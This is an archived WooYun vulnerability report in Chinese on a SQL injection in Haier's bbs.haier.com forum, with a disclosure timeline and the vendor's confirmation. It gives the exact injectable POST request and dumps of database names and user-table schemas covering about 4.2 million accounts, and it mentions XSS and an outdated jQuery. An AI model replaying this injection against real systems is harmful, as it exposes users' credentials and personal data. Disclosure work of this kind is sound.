乌云(WooYun.org)历史漏洞查询---http://wy.zone.ci/
乌云 Drops 文章在线浏览--------http://drop.zone.ci/
2014-12-13: 细节已通知厂商并且等待厂商处理中 2014-12-16: 厂商已经确认,细节仅向厂商公开 2014-12-26: 细节向核心白帽子及相关领域专家公开 2015-01-05: 细节向普通白帽子公开 2015-01-15: 细节向实习白帽子公开 2015-01-27: 细节向公众公开
这与上次提交的漏洞不是一个论坛,两个论坛账户不通用数据量均不同trs_common_member | 4222429qwh_members | 73561
1.上次提交的tbbs.haier.com http://wooyun.org/bugs/wooyun-2014-086690 这次是bbs.haier.com2.tbbs 是22个数据库bbs 是 4个库
[*] discuz15[*] information_schema[*] newdiscuz15[*] test
3.SQL注入
POST /HaierBBS/thrdapplycount/gettolcount.do HTTP/1.1Content-Length: 125Content-Type: application/x-www-form-urlencodedReferer: http://bbs.haier.com/Cookie: JSESSIONID=FDC54A75489FA666619AA7C8CDF0CB72.jvm1; idsALUserSource=""Host: bbs.haier.comConnection: Keep-aliveAccept-Encoding: gzip,deflateUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/28.0.1500.63 Safari/537.36Accept: */*sourceId=455767%2C421738%2C415616%2C256510%2C148866%2C148801%2C479712%2C484890%2C484569%2C484595%2C479986%2C484188&type=1
Database: discuz15Table: uc_members[13 columns]+---------------+-------------+| Column | Type |+---------------+-------------+| babao | double || email | varchar(96) || lastloginip | double || lastlogintime | double || myid | varchar(90) || myidkey | varchar(48) || password | varchar(96) || regdate | double || regip | varchar(45) || salt | varchar(18) || secques | varchar(24) || uid | int(11) || username | varchar(45) |+---------------+-------------+
Database: discuz15Table: trs_common_member[40 columns]+------------------+-----------------------+| Column | Type |+------------------+-----------------------+| accessmasks | tinyint(1) || adminid | int(11) || adress | varchar(100) || allowadmincp | tinyint(1) || avatar | varchar(200) || avatarstatus | tinyint(1) || birthday | varchar(100) || city | varchar(100) || conisbind | tinyint(1) unsigned || credits | int(10) || education | varchar(100) || educationid | varchar(10) || email | varchar(100) || emailstatus | tinyint(1) || extgroupids | char(20) || firstname | varchar(100) || gender | int(1) || groupexpiry | int(10) unsigned || groupid | smallint(6) unsigned || lastloginip | varchar(255) || lastlogintime | int(10) || memcercode | varchar(100) || mobile | varchar(255) || newpm | smallint(6) unsigned || newprompt | smallint(6) unsigned || notifysound | tinyint(1) || password | char(32) || profession | varchar(100) || professionid | varchar(10) || province | varchar(100) || realname | varchar(255) || regdate | int(10) unsigned || regip | varchar(255) || remark | text || status | tinyint(1) || telephone | varchar(255) || timeoffset | char(4) || uid | mediumint(8) unsigned || username | varchar(50) || videophotostatus | tinyint(1) |+------------------+-----------------------+
4222429 用户名密码
4.来个XSS
5.Jqueryhttp://bbs.haier.com/was5/web/js/jquery.min.js
/*! * jQuery JavaScript Library v1.4.2 * http://jquery.com/ * * Copyright 2010, John Resig * Dual licensed under the MIT or GPL Version 2 licenses. * http://jquery.org/license * * Includes Sizzle.js * http://sizzlejs.com/ * Copyright 2010, The Dojo Foundation * Released under the MIT, BSD, and GPL Licenses. * * Date: Sat Feb 13 22:33:48 2010 -0500 */
过滤吧
危害等级:高
漏洞Rank:10
确认时间:2014-12-16 17:49
谢乌云平台sm0nk的测试与提醒,我方已安排人员进行处理。报了tbbs的漏洞之后同时也针对bbs的这个漏洞进行修复,还是高吧,rank 10。
暂无